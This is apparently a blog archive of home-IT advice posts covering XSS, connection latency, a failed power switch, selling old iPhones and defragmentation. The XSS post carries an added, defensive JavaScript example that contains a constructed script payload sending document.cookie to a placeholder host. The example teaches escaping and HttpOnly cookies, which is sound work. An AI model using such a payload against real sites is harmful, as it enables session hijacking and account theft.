Be Your Own IT

Archive for the ‘Advice’ Category

Internet Security: The Cross-Site Scripting Attack

We all know that security on the internet is a major topic nowadays.  Even after you install your brand new web browser and your brand new antivirus, you are still vulnerable.  Why is that?  A large part of the internet security “holes”, the places you are most likely to be attacked through, are things you installed yourself: the browser, its plugins, and the scripts the sites you visit hand to it.

XSS is an abbreviation for Cross-Site Scripting.  When the term was first coined it referred to one website slipping script into a page served by another, so that the script ran in your browser with the second site’s privileges and could use your logged-in session there or read your information directly from that site.  It has since expanded to cover many more injection-style attacks that target client-side scripts, whether the injected script comes straight back in a server response (reflected), is stored by the site and served to every later visitor (stored), or is introduced by the page’s own JavaScript (DOM-based).

Client-side scripting mainly means JavaScript, although others exist.  Server-side scripting uses languages like PHP and Perl.  Client-side scripts are code the website sends to your browser to run on your computer.  These scripts can read and write the site’s cookies as a means of storing and retrieving data.  Probably the most important cookie in this context is the session cookie: websites set it when you log in and use it to keep you logged in for as long as you are at the site, or until the cookie expires.  The browser only lets a script read the cookies of the site the script is running as, but an injected script is running as that site.  So if an attacker can get code into a page’s scripts, or an entire script into your browser, what is keeping them from simply reading your session cookie and sending it to themselves?  Nothing, and with that cookie they can present themselves to the site as you.  Congratulations, you’ve now experienced session hijacking, one of the most common forms of account theft on the internet.

Web browsers have done their best to take up the task of blocking XSS attacks.  Most of today’s browsers support a cookie attribute called HttpOnly, which blocks scripts from reading the cookie; set it on the session cookie and an injected script cannot copy it.  This does not solve every problem XSS presents: the injected script still runs as you on the page and can make requests the site will accept, because the browser attaches the cookie itself.  Script blocking, either built into the browser or through a third-party add-on like NoScript for Firefox, which blocks per domain (by the name of the website), is another way to help control the problem.  By blocking almost everything and allowing only the scripts you want to run, you can protect yourself from the vast majority of XSS attacks.  Some people consider NoScript too much of a burden, though, as it breaks the functionality of many websites until it is properly set up.

So with all of these companies focusing on fixing XSS, why is it still so prevalent?  One large contributor has been Flash.  Adobe’s Flash Player isn’t just a client-side codebase; it is practically an entire platform for running rich media content on a remote PC.  It is used not only for video and music players, interactive games and user interaction, but for advertising too, and XSS opportunities crop up like weeds when Flash ads get loaded: a Flash movie that hands its parameters to JavaScript without checking them is an XSS hole just like a sloppily written page.

That being said, it’s not entirely Adobe’s fault.  Sloppy coding practices, unsanitized inputs (user-supplied text written into a page without being escaped), and vulnerabilities in the websites’ own software contribute to the problem as well.  Be wary of your scripts and who sends them to you.  If you are browsing unknown websites, tools like NoScript can be a lifesaver.
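The points above, the unescaped input that lets a script in, the session cookie it goes after, and the HttpOnly attribute that hides the cookie from it, as an added example in JavaScript (Node.js).  This is not code from the original post; the function names, the cookie layout and the constructed payload are assumptions made for this illustration.

```javascript
// Added example, not code from the original post: a minimal model of the
// reflected XSS bug the post describes and the two fixes it mentions, escaping
// untrusted input before it goes into HTML and marking the session cookie
// HttpOnly. Function names, the cookie layout and the payload are assumptions
// made for this illustration. Run with: node xss_demo.js

// Escape the five characters that let user input break out of HTML text
// or a quoted attribute value.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable: the search term from the query string is pasted straight into
// the page, so a term containing <script> becomes real script that runs as
// this site and can read its cookies.
function renderSearchPageUnsafe(term) {
  return `<h1>Results for ${term}</h1>`;
}

// Fixed: same template, but every untrusted value is escaped on the way out.
// The browser now shows the attacker's text instead of executing it.
function renderSearchPageSafe(term) {
  return `<h1>Results for ${escapeHtml(term)}</h1>`;
}

// The session cookie as the server should set it. HttpOnly hides it from
// document.cookie, Secure keeps it off plain HTTP, SameSite=Lax stops most
// cross-site requests from carrying it.
function sessionCookieHeader(sessionId) {
  return `session=${encodeURIComponent(sessionId)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// What an injected script could read: every cookie from these Set-Cookie
// headers that was NOT marked HttpOnly (a model of browser behaviour).
function cookiesVisibleToScript(setCookieHeaders) {
  return setCookieHeaders
    .filter((h) => !/;\s*HttpOnly\s*(;|$)/i.test(h))
    .map((h) => h.split('=')[0].trim());
}

// Constructed payload of the kind the post warns about: if it ran, it would
// send document.cookie to a third party (example.invalid is a reserved name).
const COOKIE_THIEF = '<script>new Image().src="https://example.invalid/?c="+document.cookie</script>';

console.log(renderSearchPageUnsafe(COOKIE_THIEF)); // script tag intact: XSS
console.log(renderSearchPageSafe(COOKIE_THIEF));   // &lt;script&gt;...: harmless text
// Only the theme cookie is readable; the HttpOnly session cookie is not.
console.log(cookiesVisibleToScript([sessionCookieHeader('abc123'), 'theme=dark; Path=/']));
```

The escaping belongs at the point where data is written into HTML, not where it is read in, because the same value may be safe in one context and dangerous in another.  HttpOnly is the second line of defence: it limits what a successful injection can steal, but the injected script can still act on the page as the logged-in user.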

Latency: The Difference between Speed and Response

When someone says their computer is slow, it isn’t actually the speed they are complaining about.  They say the computer is slow because it is unresponsive.  The PC may be fast enough to compute everything they need in a timely fashion, yet when they try to open another program they find themselves waiting.  The same concept applies to network latency.

The speed rating of your internet connection is its maximum throughput under ideal conditions.  As much as I dislike using pipe analogies when talking about network connections, one really is the best fit here.  Think of a pipe with water flowing through it and a valve in the middle: the amount of water flowing per second when the valve is open is the bandwidth.  Now let’s say the valve opens and closes a lot, because it is dispensing very specific amounts of water.

When you click on a link you are asking for the valve to open, and the time it takes your request to reach the valve is your latency.  The time from sending the request until the water starts arriving at your end is the ping time, or round-trip latency.

How this impacts bandwidth is a little devious, and potentially crippling.  Bandwidth is measured as data per unit of time, in this case Mb/s (megabits per second).  Latency adds to the time it takes to get the data from the server to you, and it is paid once per request.  If you had a 1.5Mb satellite connection, its average round-trip latency would be somewhere in the neighborhood of 1000ms-1500ms.  Add that to the transfer time and you get what the connection really feels like in terms of speed: the amount of data divided by (round-trip latency + transfer time).

Take a transfer that fills the link for exactly one second: 1.5Mb, or 1536kb (kilobits).  Dividing it by 2 seconds instead of 1 (a 1000ms round trip plus the 1 s transfer) gives an effective bandwidth of 768kb/s.  Dividing it by 2.5 seconds (a 1500ms round trip plus the 1 s transfer) gives 614kb/s.  That is also for a single request; if you are using a website that makes a new request every time you make a selection in a drop-down list, this penalty is applied on every one of them.  To give a real-world example, my parents’ satellite internet was 768kb/s with an average latency of 1800ms: 768/2.8 = 274kb/s, and it felt like it.

Now sure, if you are downloading large files that don’t change often, the speed picks up, because the round trip is paid only once at the start.  If the connection really were only 274kb/s a download would top out around 35KB/s (kb/8 = KB).  Theirs topped out around 100KB/s, but the actual experience of using it was abysmal.  You were lucky if you could even get to a YouTube video, much less watch it.  Everything nowadays has been organized into small “web ready” pieces fetched one after another for easy streaming, and that approach cripples a high-latency connection.
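The rule of thumb used above, written out as functions so it can be applied to any transfer size and to a page that needs several dependent requests.  This is an added example, not code from the original post; the function names are assumptions made for this illustration, and the model is the post’s own (one round trip paid before each transfer), not a full TCP model.

```javascript
// Added example, not code from the original post: the post's rule of thumb,
// "divide the data by (round trip + transfer time)", as functions. Units are
// kilobits (kb), kilobits per second (kb/s) and milliseconds; function names
// are assumptions for this illustration. Run with: node latency_demo.js

// Wall-clock seconds for one fetch of sizeKb over a linkKbps link when the
// request must first wait one round trip of rttMs (the post's model).
function transferSeconds(sizeKb, linkKbps, rttMs) {
  return rttMs / 1000 + sizeKb / linkKbps;
}

// The throughput the user actually experiences for that single fetch.
function effectiveKbps(sizeKb, linkKbps, rttMs) {
  return sizeKb / transferSeconds(sizeKb, linkKbps, rttMs);
}

// A page built from `requests` dependent fetches (each waiting for the
// previous one, as with the post's drop-down lists) pays the round trip
// every time.
function pageSeconds(requests, sizeKbEach, linkKbps, rttMs) {
  return requests * transferSeconds(sizeKbEach, linkKbps, rttMs);
}

// Rough kilobytes per second, the unit download managers show (kb/8 = KB).
function kbpsToKBps(kbps) {
  return kbps / 8;
}

// The post's figures fall out of the model:
console.log(effectiveKbps(1536, 1536, 1000).toFixed(0)); // 768
console.log(effectiveKbps(1536, 1536, 1500).toFixed(0)); // 614
console.log(effectiveKbps(768, 768, 1800).toFixed(0));   // 274
// A large download pays the round trip once, so it approaches line rate:
console.log(effectiveKbps(768 * 600, 768, 1800).toFixed(0)); // 766
// Twenty 20kb requests in a row on the same link: the round trips dominate.
console.log(pageSeconds(20, 20, 768, 1800).toFixed(1)); // 36.5
```

The last two lines are the whole story of the post: the same 768kb/s link delivers nearly its rated speed for one ten-minute download and takes over half a minute for twenty tiny requests that have to happen one after another.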

This wasn’t meant as a knock on satellite internet.  It serves an important niche where the only other choice may be dial-up.  Just remember, though, that speed is not always speed, and responsiveness is one of the most underrated metrics in the world.

Quick Tip: My Computer Won’t Turn On

When you come home from work and sit down at the PC to check what your friends were up to during the day, or you wake up and want to check last night’s late game score, the last thing you want is silence when you press the power button.  You apprehensively check the power connection: it’s plugged in and the strip is on.  So what gives?  The power supply?  Not always.

On an ATX power supply the actual “power switch” is not the button on the front of the case.  The supply feeds standby power to the motherboard even while the PC is off, and it turns fully on when the motherboard pulls its PS_ON signal low.  The front “Power Button” is just a momentary switch wired to the motherboard: a brief press tells the motherboard to turn the supply on, and holding it closed for about four seconds tells it to force the supply off.  The mechanism in these switches is usually quite cheaply made.  So what happens when it fails?  You get no power.

The button is wired to a pair of pins on the front-panel header of the motherboard, usually labeled PWR_SW, PWRBTN or similar on the board itself or in its manual.  Other items that may be connected to this header include the reset button, the power LED, the hard drive activity LED, and perhaps the PC speaker.  There are two ways to test for a bad power-button switch.

[Image: the front-panel header with its connectors]

The first way is to take the reset switch’s plug, move it onto the power-switch pins, and press the reset button.  If the PC turns on, there you go: bad switch.  The other way carries a little danger with it and you need to be careful.  Closing the switch just bridges, or “shorts”, the two pins.  You can take a regular flat-head screwdriver (or a jumper cap), touch it briefly across the two power-switch pins, and see if the PC turns on.  Check the pin labels first, and touch nothing else.

If you touch the wrong pins you might perform an activity known as “letting the magic smoke out”.  Some pins on the same header, such as the LED and speaker ones, carry voltage, and shorting those can fry a component; you will know you’ve done it by the small trail of blue smoke, immediately followed by the acrid smell of burnt plastic.  Needless to say this is not the outcome you desire.

So whenever possible use the reset switch.  The only two times it should not be possible are if you’ve already had a failed switch and are using the reset switch as your power button, or the manufacturer put all the front-panel connectors in a single plastic plug.

If you decide to replace the switch, know that you will most likely have to contact either the manufacturer of the PC or of the case to get a perfect match.  If you do not want to do this, or the manufacturer wants too much or won’t sell you one, you can go to your local Radio Shack or hardware store and pick up a momentary-contact (normally open) switch with two leads.  You might have to do some cosmetic alterations to your case, though, as no two switches ever seem to use the same mounting pattern.

How to Sell Your Used iPhone or iPod

So, just today I sent in my old iPhone 3G to a place that buys used iPhones, iPods, laptops, etc.  I got $95 for it, which isn’t bad, considering I got a lot of use out of it, and it’s just been sitting collecting dust.

New websites that will buy your used electronics are popping up on the web every day.  Most of these companies buy iPhones in order to fix them up a bit (if needed), refurbish them, perhaps unlock them, and then turn around and sell them.

You could certainly try to sell your phone on eBay, but you should first check completed auctions to see how much you’d probably get.  And keep in mind, if your phone is broken, most people on eBay won’t want it.  These other websites will buy your broken iPhone because certain parts inside are salvageable and aid in refurbishing a close-to-perfect phone.

So, if you’ve been wondering what to do with that old iPhone, below are some places to check out.  Before you ship it anywhere, erase it (Settings > General > Reset > Erase All Content and Settings) so your mail, photos and saved passwords don’t go with it.  Keep in mind, I’ve only dealt with cashforiphones.com.

iPhone Recycling:

CashforiPhones.com – a simple, easy transaction, and offered more $ than most websites

BuyBackMac.com – I noticed they would have given me another $10 for my phone

There were a few others that I saw online but they only offered $60 to $80.

Defragmenting=Very Important

To keep your computer running as fast as possible, it is important to perform certain maintenance tasks on it. One of these tasks is defragmenting your hard drive(s), or defrag for short.

What is defragmentation?

Let’s say you have saved a bunch of files to a brand new hard drive (HD) and then over time you remove half of them. The spaces, or blocks, those files occupied are now empty but scattered throughout the HD. Now let’s say you save a much larger file to the HD. The file system fills the smaller free gaps first, so the file is broken into pieces (fragments). When you go to open that file, the drive’s heads have to seek to every fragment to reassemble it, and the more fragments there are, the longer it takes. Defragging your HD puts those pieces back in order, allowing the system to find them faster and open the file quicker. Running periodic defrags will keep your system running as fast as possible. This only applies to spinning disks: a solid-state drive has no heads to move, gains nothing from defragging, and wears a little with every rewrite, so leave SSDs to the operating system’s own optimizer. Windows comes with its own utilities, including one for defragging, but I use a program called Defraggler.


Defraggler

Defraggler is developed by Piriform. With Defraggler you can analyze and defrag your HDs, as well as individual folders and files. I found it to be very fast and a better utility than the one that comes with Windows.
